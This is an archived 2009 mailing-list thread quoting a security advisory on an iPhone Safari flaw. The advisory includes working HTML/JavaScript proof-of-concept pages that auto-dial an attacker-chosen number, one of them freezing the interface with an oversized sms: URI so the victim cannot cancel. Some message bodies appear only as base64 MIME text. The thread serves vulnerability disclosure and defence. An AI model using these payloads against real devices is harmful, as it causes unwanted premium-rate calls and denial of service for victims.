YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
